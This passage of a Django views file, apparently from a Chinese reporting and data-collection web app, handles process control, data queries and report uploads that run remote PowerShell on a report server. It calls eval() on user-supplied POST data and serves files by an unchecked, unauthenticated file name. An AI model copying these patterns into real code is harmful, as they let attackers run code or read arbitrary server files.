current_process.status != \"运行中\":\n tag = 0\n res = \"当前进程未在运行中,请启动程序。\"\n else:\n tag, res = handle_process(current_process, handle_type=\"DESTROY\")\n if tag == 1:\n tag, res = handle_process(current_process, handle_type=\"RUN\")\n record_log(app_id, source_id, cycle_id, '进程重启成功。')\n else:\n tag = 0\n res = \"关闭进程失败。\"\n else:\n tag = 0\n res = \"未接收到操作指令。\"\n return JsonResponse({\n 'tag': tag,\n 'res': res,\n 'data': get_running_info(current_process)\n })\n else:\n current_process = ProcessMonitor()\n current_process.source_id = source_id\n if not check_type:\n current_process.app_admin_id = app_id\n current_process.cycle_id = cycle_id\n current_process.save()\n tag, res = handle_process(current_process, handle_type=\"RUN\")\n record_log(app_id, source_id, cycle_id, '进程启动成功。')\n return JsonResponse({\n 'tag': tag,\n 'res': res,\n 'data': ''\n })\n\n\ndef process_run_all(request):\n if request.user.is_authenticated():\n tag = 0\n res = \"\"\n operate = request.POST.get(\"operate\", \"\")\n all_process_data = request.POST.get(\"all_process_data\", \"\")\n all_process_data = json.loads(all_process_data)\n\n for i in all_process_data:\n check_type = i['check_type']\n if not check_type:\n try:\n app_id = int(i['a_id'])\n cycle_id = int(i['c_id'])\n source_id = int(i['s_id'])\n except:\n pass\n else:\n try:\n source_id = int(i['s_id'])\n except:\n pass\n\n # 进程操作记入日志\n def record_log_all(app_id, source_id, cycle_id, msg):\n try:\n log = LogInfo()\n log.source_id = source_id\n log.app_id = app_id\n log.cycle_id = cycle_id\n log.create_time = datetime.datetime.now()\n log.content = msg\n log.save()\n except:\n pass\n\n # 固定进程\n current_process = ProcessMonitor.objects.filter(source_id=source_id).exclude(state='9')\n\n # 动态进程\n if not check_type:\n current_process = ProcessMonitor.objects.filter(source_id=source_id).filter(app_admin_id=app_id).filter(\n cycle_id=cycle_id).exclude(state='9')\n\n if current_process.exists():\n current_process = current_process[0]\n if operate == 'all_start':\n # 查看是否运行中\n if current_process.status == \"运行中\":\n continue\n else:\n tag, res = handle_process(current_process, handle_type=\"RUN\")\n record_log_all(app_id, source_id, cycle_id, '进程启动成功。')\n elif operate == 'all_stop':\n if current_process.status != \"运行中\":\n continue\n else:\n tag, res = handle_process(current_process, handle_type=\"DESTROY\")\n record_log_all(app_id, source_id, cycle_id, '进程关闭成功。')\n else:\n tag = 0\n res = \"未接收到操作指令。\"\n\n else:\n current_process = ProcessMonitor()\n current_process.source_id = source_id\n if not check_type:\n current_process.app_admin_id = app_id\n current_process.cycle_id = cycle_id\n current_process.save()\n tag, res = handle_process(current_process, handle_type=\"RUN\")\n record_log_all(app_id, source_id, cycle_id, '进程启动成功。')\n return JsonResponse({\n 'tag': tag,\n 'res': res,\n 'data': ''\n })\n\n\ndef pm_target_data(request):\n \"\"\"\n 根据应用、数据源、周期 过滤出所有指标\n :param request:\n :return:\n \"\"\"\n if request.user.is_authenticated():\n app_id = request.GET.get('app_id', '')\n source_id = request.GET.get('source_id', '')\n cycle_id = request.GET.get('cycle_id', '')\n\n result = []\n\n supplement_status = '0' # 1启动成功 0完成 2失败\n try:\n app_id = int(app_id)\n source_id = int(source_id)\n cycle_id = int(cycle_id)\n except ValueError as e:\n print(e)\n else:\n targets = Target.objects.exclude(state='9').filter(\n Q(adminapp_id=app_id) & Q(source_id=source_id) & Q(cycle_id=cycle_id)).select_related('storage')\n\n for target in targets:\n result.append({\n 'id': 
target.id,\n 'target_code': target.code,\n 'target_name': target.name,\n 'source_content': target.source_content,\n 'storage_table_name': target.storage.tablename if target.storage else '',\n 'storage_fields': target.storagefields[:-1] if target.storagefields.endswith(\n ',') else target.storagefields\n })\n\n # 补取进程的状态 1/0/2\n try:\n primary_process = ProcessMonitor.objects.exclude(state='9').get(app_admin_id=app_id,\n source_id=source_id,\n cycle_id=cycle_id)\n except ProcessMonitor.DoesNotExist as e:\n print(e)\n else:\n supplement_process = SupplementProcess.objects.exclude(state='9').filter(\n primary_process=primary_process).last()\n supplement_status = supplement_process.p_state if supplement_process else '0'\n\n return JsonResponse({\n \"data\": result,\n 'supplement_status': supplement_status\n })\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef get_exception_data(request):\n if request.user.is_authenticated():\n result = []\n app_id = request.GET.get('app_id', '')\n source_id = request.GET.get('source_id', '')\n cycle_id = request.GET.get('cycle_id', '')\n\n try:\n app_id = int(app_id)\n source_id = int(source_id)\n cycle_id = int(cycle_id)\n except ValueError as e:\n print(e)\n else:\n t_now = datetime.datetime.now()\n\n t_before = t_now - datetime.timedelta(days=90)\n t_after = t_now + datetime.timedelta(days=90)\n\n exceptions = ExceptionData.objects.filter(\n app_id=app_id, source_id=source_id, cycle_id=cycle_id\n ).filter(extract_error_time__range=[t_before, t_after]).exclude(state=9).order_by('-id')\n for num, exception in enumerate(exceptions):\n result.append({\n 'id': exception.id,\n 'target_name': exception.target.name if exception.target else '',\n 'extract_error_time': '{:%Y-%m-%d %H:%M:%S}'.format(\n exception.extract_error_time) if exception.extract_error_time else '',\n 'supplement_times': exception.supplement_times,\n 'last_supplement_time': '{:%Y-%m-%d %H:%M:%S}'.format(\n exception.last_supplement_time) if exception.last_supplement_time else '',\n })\n if num > 98:\n break\n return JsonResponse({\"data\": result})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef exception_data_del(request):\n if request.user.is_authenticated():\n status = 1\n data = ''\n id = request.POST.get('id', '')\n try:\n id = int(id)\n ex_data = ExceptionData.objects.get(id=id)\n except:\n status = 0\n data = '该异常信息不存在。'\n else:\n ex_data.state = \"9\"\n ex_data.save()\n status = 1\n data = '删除成功。'\n\n return JsonResponse({\n 'status': status,\n 'data': data\n })\n\n\ndef get_log_info(request):\n if request.user.is_authenticated():\n result = []\n app_id = request.GET.get('app_id', '')\n source_id = request.GET.get('source_id', '')\n cycle_id = request.GET.get('cycle_id', '')\n\n try:\n app_id = int(app_id)\n source_id = int(source_id)\n cycle_id = int(cycle_id)\n except ValueError as e:\n print(e)\n else:\n t_now = datetime.datetime.now()\n\n t_before = t_now - datetime.timedelta(days=90)\n t_after = t_now + datetime.timedelta(days=90)\n\n log_infos = LogInfo.objects.filter(\n Q(app_id=app_id) & Q(source_id=source_id) & Q(cycle_id=cycle_id)\n ).filter(create_time__range=[t_before, t_after]).order_by('-create_time')\n\n for num, log_info in enumerate(log_infos):\n result.append({\n 'id': num + 1,\n 'create_time': '{:%Y-%m-%d %H:%M:%S}'.format(\n log_info.create_time) if log_info.create_time else '',\n 'content': log_info.content,\n })\n if num > 98:\n break\n return JsonResponse({\"data\": result})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef 
target_test(request):\n \"\"\"\n 选择数据源测试取数\n :param request:\n :return:\n \"\"\"\n if request.user.is_authenticated():\n selectedtarget = request.POST.get('selectedtarget', '[]')\n result = {\n \"status\": 1,\n \"data\": [],\n }\n\n class DecimalEncoder(json.JSONEncoder):\n \"\"\"\n 解决Decimal无法序列化问题\n \"\"\"\n\n def default(self, obj):\n if isinstance(obj, decimal.Decimal):\n return float(obj)\n return super(DecimalEncoder, self).default(obj)\n\n try:\n now_time = datetime.datetime.now()\n\n targets = Target.objects.filter(id__in=eval(selectedtarget))\n tmp_list = []\n for target in targets:\n ret = Extract.getDataFromSource(target, now_time)\n result_list = ret['result']\n error = ret['error']\n\n if error:\n tmp_list.append({\n \"target_id\": target.id,\n \"target_code\": target.code,\n \"target_name\": target.name,\n \"data\": error,\n \"status\": 'ERROR'\n })\n else:\n tmp_list.append({\n \"target_id\": target.id,\n \"target_code\": target.code,\n \"target_name\": target.name,\n \"data\": result_list,\n \"status\": 'SUCCESS'\n })\n except Exception as e:\n print(e)\n result['status'] = 0\n else:\n result['data'] = json.dumps(tmp_list, cls=DecimalEncoder)\n\n \"\"\"\n [{\n \"target_id\": \"\",\n \"target_code\": \"\",\n \"target_name\": \"\",\n \"data\": [...],\n \"status\": \"SUCCESS\"\n }, {\n \"target_id\": \"\",\n \"target_code\": \"\",\n \"target_name\": \"\",\n \"data\": \"\",\n \"status\": \"ERROR\"\n }]\n\n \"\"\"\n return JsonResponse(result)\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef supplement_process(request):\n \"\"\"\n 选择数据源指定区间补取数据\n :param request:\n :return:\n \"\"\"\n if request.user.is_authenticated():\n result = {\n 'status': 1,\n 'data': '成功启动补取。'\n }\n\n selectedtarget = request.POST.get('selectedtarget', '[]')\n start_time = request.POST.get('start_time', '')\n end_time = request.POST.get('end_time', '')\n cp_id = request.POST.get('cp_id', '')\n\n try:\n selectedtarget = eval(selectedtarget)\n except:\n pass\n\n try:\n cp_id = int(cp_id)\n except:\n result['status'] = 0\n result['data'] = '启动补取失败。'\n else:\n if not start_time:\n result['status'] = 0\n result['data'] = '开始时间未填写。'\n elif not end_time:\n result['status'] = 0\n result['data'] = '结束时间未填写。'\n else:\n # 先存入数据库\n try:\n start_time = datetime.datetime.strptime(start_time, '%Y-%m-%d %H:%M:%S')\n except Exception as e:\n print(e)\n start_time = None\n try:\n end_time = datetime.datetime.strptime(end_time, '%Y-%m-%d %H:%M:%S')\n except Exception as e:\n print(e)\n end_time = None\n if all([start_time, end_time]):\n if start_time > end_time:\n return JsonResponse({\n 'status': 0,\n 'data': '开始时间不得迟于结束时间。'\n })\n\n supplement_process = SupplementProcess()\n supplement_process.start_time = start_time\n supplement_process.end_time = end_time\n supplement_process.p_state = '1'\n supplement_process.primary_process_id = cp_id\n supplement_process.setup_time = datetime.datetime.now()\n supplement_process.save()\n\n tmp_selectedtarget = ''\n\n if type(selectedtarget) == tuple:\n for st in selectedtarget:\n tmp_selectedtarget += str(st) + '^'\n else:\n tmp_selectedtarget = str(selectedtarget)\n\n process_path = BASE_DIR + os.sep + \"utils\" + os.sep + \"handle_process.py\" + \" {0} {1}\".format(\n cp_id, tmp_selectedtarget if not tmp_selectedtarget.endswith('^') else tmp_selectedtarget[:-1]\n )\n\n try:\n win32api.ShellExecute(0, 'open', 'python', r'-i {process_path}'.format(process_path=process_path),\n '', 0)\n except:\n result['status'] = 0\n result['data'] = '启动补取失败。'\n\n return 
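# --- The DecimalEncoder defined in target_test above, in standalone form,
# plus json.loads in place of eval(): eval on a POSTed string executes
# arbitrary expressions, while json.loads only accepts data. A sketch, not
# a drop-in replacement for the view.
import decimal
import json

class DecimalEncoder(json.JSONEncoder):
    """Serialize Decimal values (common in DB query results) as floats."""
    def default(self, obj):
        if isinstance(obj, decimal.Decimal):
            return float(obj)
        return super(DecimalEncoder, self).default(obj)

def parse_selected_ids(raw):
    """Safely parse a JSON id list such as "[1, 2, 3]"."""
    try:
        return [int(x) for x in json.loads(raw or "[]")]
    except (ValueError, TypeError):
        return []

print(parse_selected_ids("[1, 2, 3]"))
print(json.dumps({"value": decimal.Decimal("1.25")}, cls=DecimalEncoder))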
JsonResponse(result)\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef get_supplement_process_info(request):\n \"\"\"\n 获取补取进程信息\n :param request:\n :return:\n \"\"\"\n if request.user.is_authenticated():\n cp_id = request.POST.get('cp_id', '')\n result = {\n 'status': 1,\n 'data': ''\n }\n try:\n cp_id = int(cp_id)\n except:\n result['status'] = 0\n result['data'] = '获取补取进程信息失败。'\n else:\n sp = SupplementProcess.objects.exclude(state='9').filter(primary_process_id=cp_id).last()\n if sp:\n p_id = sp.p_id\n setup_time = sp.setup_time\n update_time = sp.update_time\n p_state = sp.p_state\n start_time = sp.start_time\n end_time = sp.end_time\n progress_time = sp.progress_time\n result['data'] = {\n 'p_id': p_id,\n 'setup_time': '{:%Y-%m-%d %H:%M:%S}'.format(setup_time) if setup_time else '',\n 'update_time': '{:%Y-%m-%d %H:%M:%S}'.format(update_time) if update_time else '',\n 'p_state': p_state,\n 'start_time': '{:%Y-%m-%d %H:%M:%S}'.format(start_time) if start_time else '',\n 'end_time': '{:%Y-%m-%d %H:%M:%S}'.format(end_time) if end_time else '',\n 'progress_time': '{:%Y-%m-%d %H:%M:%S}'.format(progress_time) if progress_time else '',\n }\n else:\n result['status'] = 0\n result['data'] = '补取进程不存在。'\n\n return JsonResponse(result)\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef get_process_monitor_info(request):\n \"\"\"\n 获取取数进程信息\n :param request:\n :return:\n \"\"\"\n if request.user.is_authenticated():\n cp_id = request.POST.get('cp_id', '')\n result = {\n 'status': 1,\n 'data': ''\n }\n try:\n cp_id = int(cp_id)\n except:\n result['status'] = 0\n result['data'] = '获取补取进程信息失败。'\n else:\n try:\n pm = ProcessMonitor.objects.get(id=cp_id)\n except ProcessMonitor.DoesNotExist as e:\n result['status'] = 0\n result['data'] = '取数进程不存在。'\n else:\n source_name = pm.source.name if pm.source else ''\n source_code = pm.source.code if pm.source else ''\n # 数据源类型\n source_type = \"\"\n try:\n source_type = DictList.objects.get(id=pm.source.sourcetype).name\n except Exception as e:\n print(e)\n app_name = pm.app_admin.name if pm.app_admin else ''\n cycle_name = pm.cycle.name if pm.cycle else ''\n status = pm.status\n create_time = '{:%Y-%m-%d %H:%M:%S}'.format(pm.create_time) if pm.create_time else ''\n last_time = '{:%Y-%m-%d %H:%M:%S}'.format(pm.last_time) if pm.last_time else ''\n\n result['data'] = {\n 'source_name': source_name,\n 'source_code': source_code,\n 'source_type': source_type,\n 'app_name': app_name,\n 'cycle_name': cycle_name,\n 'create_time': create_time,\n 'last_time': last_time,\n 'status': status,\n }\n return JsonResponse(result)\n else:\n return HttpResponseRedirect(\"/login\")\n\n\n@csrf_exempt\ndef download_file(request):\n file_name = request.GET.get(\"file_name\", \"\")\n try:\n c_file_path = settings.BASE_DIR + os.sep + \"datacenter\" + os.sep + \"upload\" + os.sep + \"report_doc\" + os.sep + file_name\n file = open(c_file_path, 'rb')\n response = FileResponse(file)\n response['Content-Type'] = 'application/octet-stream'\n response['Content-Disposition'] = 'attachment;filename=\"{0}\"'.format(\n escape_uri_path(file_name)) # escape_uri_path()解决中文名文件\n return response\n except:\n return HttpResponseRedirect(\"/report\")\n\n\ndef report_index(request, funid):\n \"\"\"\n 报表管理\n \"\"\"\n if request.user.is_authenticated():\n errors = []\n id = \"\"\n report_type_list = []\n\n # 下拉框选项\n c_dict_index_1 = DictIndex.objects.filter(\n id=7).exclude(state='9')\n if c_dict_index_1.exists():\n c_dict_index_1 = c_dict_index_1[0]\n dict_list1 = 
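# --- Sketch: get_supplement_process_info and get_process_monitor_info above
# repeat the pattern `'{:%Y-%m-%d %H:%M:%S}'.format(dt) if dt else ''` for
# half a dozen fields. A tiny helper (hypothetical name, not from the
# original code) removes the repetition:
import datetime

def fmt_dt(value, fmt="%Y-%m-%d %H:%M:%S"):
    """Format a datetime, returning '' for None (matches the views' output)."""
    return value.strftime(fmt) if value else ""

print(fmt_dt(datetime.datetime(2020, 1, 2, 3, 4, 5)))  # 2020-01-02 03:04:05
print(repr(fmt_dt(None)))                               # ''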
c_dict_index_1.dictlist_set.exclude(state=\"9\")\n for i in dict_list1:\n report_type_list.append({\n \"report_name\": i.name,\n \"report_type_id\": i.id,\n })\n all_app = App.objects.exclude(state=\"9\")\n all_app_list = []\n for app in all_app:\n all_app_list.append({\n \"app_id\": app.id,\n \"app_name\": app.name,\n })\n\n # 新增/修改报表模型\n if request.method == \"POST\":\n id = request.POST.get(\"id\", \"\")\n name = request.POST.get(\"name\", \"\")\n code = request.POST.get(\"code\", \"\")\n report_type = request.POST.get(\"report_type\", \"\")\n app = request.POST.get(\"app\", \"\")\n sort = request.POST.get(\"sort\", \"\")\n # 二进制文件数据\n my_file = request.FILES.get(\"report_file\", None)\n\n file_name = my_file.name if my_file else \"\"\n\n # 是否报表模板\n if_template = request.POST.get(\"if_template\", \"\")\n try:\n if_template = int(if_template)\n except Exception:\n pass\n\n # 报表信息组(键值对)的数量\n report_info_num = 0\n for key in request.POST.keys():\n if \"report_info_\" in key:\n report_info_num += 1\n\n try:\n id = int(id)\n except:\n raise Http404()\n\n # 新增时提示导入文件\n if not my_file and id == 0:\n errors.append(\"请选择要导入的文件。\")\n else:\n if if_contains_sign(file_name):\n errors.append(r\"\"\"请注意文件命名格式,'#\\/\"*?<>'符号文件不允许上传。\"\"\")\n else:\n file_names=file_name.split('.')\n if file_names[-1]!='cpt' and file_names[-1] != \"\":\n errors.append(r\"\"\"只能上传cpt文件。\"\"\")\n else:\n # 报表存储位置\n myfilepath = settings.BASE_DIR + os.sep + \"datacenter\" + os.sep + \"upload\" + os.sep + \"report_doc\" + os.sep + file_name\n # 判断数据库中文件存储记录\n c_exist_model = ReportModel.objects.filter(file_name=file_name).exclude(state=\"9\")\n\n # 新增时判断是否存在,修改时覆盖,不需要判断\n if c_exist_model.exists() and id == 0:\n errors.append(\"该文件已存在,请勿重复上传。\")\n else:\n if name.strip() == '':\n errors.append('报表名称不能为空。')\n else:\n if code.strip() == '':\n errors.append('报表编码不能为空。')\n else:\n if report_type.strip() == '':\n errors.append('报表类别不能为空。')\n else:\n if app.strip() == '' and if_template == 0:\n errors.append('关联应用不能为空。')\n else:\n write_tag = False\n # 新增 或者 修改(且有my_file存在) 时写入文件\n if id == 0 or id != 0 and my_file:\n # 判断请求服务器下载文件条件是否满足\n # ps_script_path/report_file_path/web_server/report_server/username/password\n rs = ReportServer.objects.first()\n if not rs:\n errors.append('报表服务器参数未配置,报表上传失败。')\n elif not rs.report_server:\n errors.append('报表服务器地址未配置,报表上传失败。')\n elif not rs.username:\n errors.append('报表服务器用户名未配置,报表上传失败。')\n elif not rs.password:\n errors.append('报表服务器密码未配置,报表上传失败。')\n elif not rs.report_file_path:\n errors.append('报表存放路径未配置,报表上传失败。')\n else:\n try:\n with open(myfilepath, 'wb+') as f:\n for chunk in my_file.chunks():\n f.write(chunk)\n except:\n errors.append('文件上传失败。')\n else:\n # 只要有文件写入,就发送请求\n # 远程执行命令,令远程windows发送请求下载文件\n pre_ps_path = os.path.join(rs.report_file_path, 'report_ps')\n ps_script_path = os.path.join(pre_ps_path, 'request.ps1')\n report_file_path = os.path.join(rs.report_file_path, file_name)\n remote_ip = rs.report_server.split(':')[0]\n remote_user = rs.username\n remote_password = rs.password\n remote_platform = \"Windows\"\n\n # 判断ps脚本是否存在\n # 若不存在,创建路径,写入文件\n ps_check_cmd = r'if not exist {pre_ps_path} md {pre_ps_path}'.format(\n pre_ps_path=pre_ps_path)\n ps_script = ServerByPara(ps_check_cmd, remote_ip, remote_user,\n remote_password, remote_platform)\n ps_result = ps_script.run(\"\")\n\n if ps_result['exec_tag'] == 1:\n errors.append(ps_result['log'])\n else:\n # 写入脚本文件\n ps_upload_cmd = 'echo param($a, $b) > %s &' % ps_script_path + \\\n 'echo $Response=Invoke-WebRequest -Uri $b 
>> %s &' % ps_script_path + \\\n 'echo try{ >> %s &' % ps_script_path + \\\n 'echo [System.IO.File]::WriteAllBytes($a, $Response.Content) >> %s &' % ps_script_path + \\\n 'echo }catch{ >> %s &' % ps_script_path + \\\n 'echo [System.Console]::WriteLine($_.Exception.Message) >> %s &' % ps_script_path + \\\n 'echo } >> %s &' % ps_script_path\n ps_upload = ServerByPara(ps_upload_cmd, remote_ip, remote_user,\n remote_password, remote_platform)\n ps_upload_result = ps_upload.run(\"\")\n\n if ps_upload_result['exec_tag'] == 1:\n errors.append(ps_upload_result['log'])\n else:\n # 判断报表路径是否存在\n # 若不存在,提示不存在,报表上传失败\n # 获取app_code\n app_code = \"TMP\"\n if if_template: # 模板\n app_code = \"DATACENTER_TEMPLATE\"\n else:\n try:\n cur_app = App.objects.get(id=int(app))\n app_code = cur_app.code\n except:\n pass\n\n aft_report_file_path = os.path.join(rs.report_file_path, str(app_code))\n report_check_cmd = r'if not exist {report_file_path} md {report_file_path}'.format(\n report_file_path=aft_report_file_path)\n rc = ServerByPara(report_check_cmd, remote_ip,\n remote_user,\n remote_password, remote_platform)\n rc_result = rc.run(\"\")\n\n if rc_result['exec_tag'] == 1:\n errors.append(rc_result['log'])\n else:\n # 获取本地IP\n try:\n web_server = socket.gethostbyname(\n socket.gethostname())\n except Exception as e:\n errors.append(\"获取服务器IP失败:%s\" % e)\n else:\n url_visited = r\"http://{web_server}/download_file?file_name={file_name}\".format(\n web_server=web_server, file_name=file_name)\n remote_cmd = r'powershell.exe -ExecutionPolicy RemoteSigned -file \"{0}\" \"{1}\" \"{2}\"'.format(\n ps_script_path,\n os.path.join(aft_report_file_path,\n file_name), url_visited)\n\n server_obj = ServerByPara(remote_cmd, remote_ip,\n remote_user,\n remote_password,\n remote_platform)\n result = server_obj.run(\"\")\n if result[\"exec_tag\"] == 0:\n write_tag = True\n else:\n errors.append(result['log'])\n\n if id != 0 and not my_file:\n write_tag = True\n # 远程文件下载成功\n if write_tag:\n # 新增报表模板\n if id == 0:\n all_report = ReportModel.objects.filter(\n code=code).exclude(state=\"9\")\n if all_report.exists():\n errors.append('报表编码:' + code + '已存在。')\n else:\n try:\n report_save = ReportModel()\n report_save.name = name\n report_save.code = code\n report_save.report_type = report_type\n report_save.app_id = int(app) if not if_template else None\n report_save.file_name = file_name\n report_save.sort = int(sort) if sort else None\n report_save.if_template = if_template\n\n report_save.save()\n\n if if_template == 0:\n # 关联存储报表模板信息\n if report_info_num:\n range_num = int(report_info_num / 3)\n for i in range(0, range_num):\n report_info = ReportInfo()\n report_info_name = request.POST.get(\n \"report_info_name_%d\" % (i + 1), \"\")\n report_info_default_value = request.POST.get(\n \"report_info_value_%d\" % (i + 1), \"\")\n if report_info_name:\n report_info.name = report_info_name\n report_info.default_value = report_info_default_value\n report_info.report_model = report_save\n report_info.save()\n\n id = report_save.id\n except:\n errors.append('数据异常,请联系管理员!')\n # 修改报表模板\n else:\n all_report = ReportModel.objects.filter(code=code).exclude(\n id=id).exclude(state=\"9\")\n if all_report.exists():\n errors.append('存储编码:' + code + '已存在。')\n else:\n try:\n report_save = ReportModel.objects.get(\n id=id)\n report_save.name = name\n report_save.code = code\n report_save.report_type = report_type\n report_save.app_id = int(app) if not if_template else None\n if my_file:\n report_save.file_name = file_name\n report_save.sort = 
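# --- Sketch of what the chained `echo ... >> request.ps1` commands above
# assemble on the remote Windows host: a two-parameter PowerShell script that
# downloads $b and writes the bytes to $a. Building the text once is easier
# to audit than seven chained echoes; ServerByPara is assumed as-is.
PS1_TEMPLATE = """param($a, $b)
$Response=Invoke-WebRequest -Uri $b
try{
[System.IO.File]::WriteAllBytes($a, $Response.Content)
}catch{
[System.Console]::WriteLine($_.Exception.Message)
}
"""

def build_ps_upload_cmd(ps_script_path):
    """Reproduce the chained-echo cmd string the view builds from the template."""
    lines = PS1_TEMPLATE.strip().splitlines()
    cmd = "echo %s > %s &" % (lines[0], ps_script_path)
    for line in lines[1:]:
        cmd += "echo %s >> %s &" % (line, ps_script_path)
    return cmd

print(build_ps_upload_cmd(r"C:\reports\report_ps\request.ps1"))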
int(sort) if sort else None\n report_save.if_template = if_template\n report_save.save()\n\n if if_template == 0:\n # 修改报表信息关联\n # 情况:报表信息组相对数据库中存储树,增加/减少/相同 一样\n if report_info_num:\n range_num = int(report_info_num / 3)\n current_report_info = report_save.reportinfo_set.exclude(\n state=\"9\")\n\n update_id_list = []\n for i in range(0, range_num):\n report_info_name = request.POST.get(\n \"report_info_name_%d\" % (i + 1), \"\")\n report_info_default_value = request.POST.get(\n \"report_info_value_%d\" % (i + 1), \"\")\n report_info_id = request.POST.get(\n \"report_info_id_%d\" % (i + 1), \"\")\n report_info_id = int(\n report_info_id) if report_info_id else \"\"\n\n if report_info_id:\n update_id_list.append(report_info_id)\n report_info = ReportInfo.objects.filter(\n id=report_info_id)\n if report_info.exists() and report_info_name:\n report_info = report_info[0]\n report_info.name = report_info_name\n report_info.default_value = report_info_default_value\n report_info.report_model = report_save\n report_info.save()\n else:\n report_info = ReportInfo()\n if report_info_name:\n report_info.name = report_info_name\n report_info.default_value = report_info_default_value\n report_info.report_model = report_save\n report_info.save()\n update_id_list.append(report_info.id)\n current_report_info.exclude(\n id__in=update_id_list).update(\n state=\"9\")\n\n id = report_save.id\n except Exception as e:\n errors.append(\"修改失败。\")\n else:\n errors.append('本次报表上传任务失败。')\n return render(request, 'report.html',\n {'username': request.user.userinfo.fullname,\n \"report_type_list\": report_type_list,\n \"all_app_list\": all_app_list,\n \"errors\": errors,\n \"id\": id,\n \"pagefuns\": getpagefuns(funid,request)})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef report_app_index(request, funid):\n \"\"\"\n 应用报表管理\n \"\"\"\n if request.user.is_authenticated():\n errors = []\n id = \"\"\n report_type_list = []\n adminapp = \"\"\n try:\n cur_fun = Fun.objects.filter(id=int(funid)).exclude(state='9')\n adminapp = cur_fun[0].app_id\n except:\n return HttpResponseRedirect(\"/index\")\n\n # 下拉框选项\n c_dict_index_1 = DictIndex.objects.filter(\n id=7).exclude(state='9')\n if c_dict_index_1.exists():\n c_dict_index_1 = c_dict_index_1[0]\n dict_list1 = c_dict_index_1.dictlist_set.exclude(state=\"9\")\n for i in dict_list1:\n report_type_list.append({\n \"report_name\": i.name,\n \"report_type_id\": i.id,\n })\n all_app = App.objects.exclude(state=\"9\")\n all_app_list = []\n for app in all_app:\n all_app_list.append({\n \"app_id\": app.id,\n \"app_name\": app.name,\n })\n\n # 新增/修改报表模型\n if request.method == \"POST\":\n id = request.POST.get(\"id\", \"\")\n name = request.POST.get(\"name\", \"\")\n code = request.POST.get(\"code\", \"\")\n report_type = request.POST.get(\"report_type\", \"\")\n app = request.POST.get(\"app\", \"\")\n sort = request.POST.get(\"sort\", \"\")\n # 二进制文件数据\n my_file = request.FILES.get(\"report_file\", None)\n\n file_name = my_file.name if my_file else \"\"\n\n # 报表信息组(键值对)的数量\n report_info_num = 0\n for key in request.POST.keys():\n if \"report_info_\" in key:\n report_info_num += 1\n\n try:\n id = int(id)\n except:\n raise Http404()\n\n # 新增时提示导入文件\n if not my_file and id == 0:\n errors.append(\"请选择要导入的文件。\")\n else:\n if if_contains_sign(file_name):\n errors.append(r\"\"\"请注意文件命名格式,'#\\/\"*?<>'符号文件不允许上传。\"\"\")\n else:\n file_names = file_name.split('.')\n if file_names[-1] != 'cpt' and file_names[-1] != \"\":\n errors.append(r\"\"\"只能上传cpt文件。\"\"\")\n else:\n # 报表存储位置\n 
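# --- Sketch: report_index counts every POST key containing "report_info_"
# and divides by three because each group submits a name, a value, and an
# id. Grouping the triples by their index is more direct and tolerates gaps;
# standalone, with a plain dict standing in for request.POST.
import re

def collect_report_info(post):
    """Group report_info_name_N / report_info_value_N / report_info_id_N triples."""
    groups = {}
    pattern = re.compile(r"^report_info_(name|value|id)_(\d+)$")
    for key, value in post.items():
        m = pattern.match(key)
        if m:
            field, idx = m.group(1), int(m.group(2))
            groups.setdefault(idx, {})[field] = value
    return [groups[i] for i in sorted(groups)]

post = {
    "report_info_name_1": "区域", "report_info_value_1": "华东", "report_info_id_1": "8",
    "report_info_name_2": "机组", "report_info_value_2": "#1", "report_info_id_2": "",
}
print(collect_report_info(post))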
myfilepath = settings.BASE_DIR + os.sep + \"datacenter\" + os.sep + \"upload\" + os.sep + \"report_doc\" + os.sep + file_name\n # 判断数据库中文件存储记录\n c_exist_model = ReportModel.objects.filter(file_name=file_name).exclude(state=\"9\")\n\n # 新增时判断是否存在,修改时覆盖,不需要判断\n if c_exist_model.exists() and id == 0:\n errors.append(\"该文件已存在,请勿重复上传。\")\n else:\n if name.strip() == '':\n errors.append('报表名称不能为空。')\n else:\n if code.strip() == '':\n errors.append('报表编码不能为空。')\n else:\n if report_type.strip() == '':\n errors.append('报表类型不能为空。')\n else:\n if app.strip() == '':\n errors.append('关联应用不能为空。')\n else:\n write_tag = False\n # 新增 或者 修改(且有my_file存在) 时写入文件\n if id == 0 or id != 0 and my_file:\n # 判断请求服务器下载文件条件是否满足\n # ps_script_path/report_file_path/web_server/report_server/username/password\n rs = ReportServer.objects.first()\n if not rs:\n errors.append('报表服务器参数未配置,报表上传失败。')\n elif not rs.report_server:\n errors.append('报表服务器地址未配置,报表上传失败。')\n elif not rs.username:\n errors.append('报表服务器用户名未配置,报表上传失败。')\n elif not rs.password:\n errors.append('报表服务器密码未配置,报表上传失败。')\n elif not rs.report_file_path:\n errors.append('报表存放路径未配置,报表上传失败。')\n else:\n try:\n with open(myfilepath, 'wb+') as f:\n for chunk in my_file.chunks():\n f.write(chunk)\n except Exception as e:\n print(e)\n errors.append('文件上传失败。')\n else:\n # 只要有文件写入,就发送请求\n # 远程执行命令,令远程windows发送请求下载文件\n pre_ps_path = os.path.join(rs.report_file_path, 'report_ps')\n ps_script_path = os.path.join(pre_ps_path, 'request.ps1')\n report_file_path = os.path.join(rs.report_file_path, file_name)\n remote_ip = rs.report_server.split(':')[0]\n remote_user = rs.username\n remote_password = rs.password\n remote_platform = \"Windows\"\n\n # 判断ps脚本是否存在\n # 若不存在,创建路径,写入文件\n ps_check_cmd = r'if not exist {pre_ps_path} md {pre_ps_path}'.format(\n pre_ps_path=pre_ps_path)\n ps_script = ServerByPara(ps_check_cmd, remote_ip, remote_user,\n remote_password, remote_platform)\n ps_result = ps_script.run(\"\")\n\n if ps_result['exec_tag'] == 1:\n errors.append(ps_result['log'])\n else:\n # 写入脚本文件\n ps_upload_cmd = 'echo param($a, $b) > %s &' % ps_script_path + \\\n 'echo $Response=Invoke-WebRequest -Uri $b >> %s &' % ps_script_path + \\\n 'echo try{ >> %s &' % ps_script_path + \\\n 'echo [System.IO.File]::WriteAllBytes($a, $Response.Content) >> %s &' % ps_script_path + \\\n 'echo }catch{ >> %s &' % ps_script_path + \\\n 'echo [System.Console]::WriteLine($_.Exception.Message) >> %s &' % ps_script_path + \\\n 'echo } >> %s &' % ps_script_path\n ps_upload = ServerByPara(ps_upload_cmd, remote_ip, remote_user,\n remote_password, remote_platform)\n ps_upload_result = 